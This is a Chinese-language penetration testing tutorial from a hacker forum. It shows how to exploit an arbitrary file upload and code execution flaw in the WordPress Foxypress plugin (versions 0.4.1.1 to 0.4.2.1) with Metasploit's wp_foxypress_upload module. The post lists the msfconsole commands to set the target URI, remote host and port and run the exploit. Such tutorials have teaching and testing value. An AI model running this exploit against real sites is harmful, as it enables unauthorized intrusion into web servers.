WordPress渗透测试实战教程：利用插件Foxypress的任意代码执行漏洞-渗透测试教程「任意代码执行漏洞,渗透测试实战教程,foxypress思路-任意代码执行漏洞,渗透测试实战教程,foxypress方法-任意代码执行漏洞,渗透测试实战教程,foxypress工具-任意代码执行漏洞,渗透测试实战教程,foxypress教程」蚁安黑客技术论坛-第1页

该模块利用WordPress博客软件插件（称为Foxypress）中的任意PHP代码执行缺陷。该漏洞允许通过uploadify.php脚本进行任意文件上载和远程代码执行。Foxypress插件版本0.4.1.1到0.4.2.1很容易受到攻击。
利用目标
Foxypress插件版本0.4.1.1到0.4.2.1
需求
攻击者：kali Linux
受害者PC：Foxypress插件
打开Kali终端类型 msfconsole

描述：渗透测试实战教程：利用WordPress插件Foxypress的任意代码执行漏洞

图片：1.png

现在输入 exploit use / unix / webapp / wp_foxypress_upload
msf exploit (wp_foxypress_upload)>set targeturi /wordpress
msf exploit (wp_foxypress_upload)>set rhost 192.168.0.105 (IP of Remote Host)
msf exploit (wp_foxypress_upload)>set rport 80
msf exploit (wp_foxypress_upload)>exploit

描述：渗透测试实战教程：利用WordPress插件Foxypress的任意代码执行漏洞

图片：foxy.png

本文标题：WordPress渗透测试实战教程：利用插件Foxypress的任意代码执行漏洞
本文作者：zevseo
本文来自：蚁安黑客官网
转载请注明本文链接:http://www.mayidui.net/t2321.html

WordPress渗透测试实战教程：利用插件Foxypress的任意代码执行漏洞

热门话题

黑客教程

蚁安黑客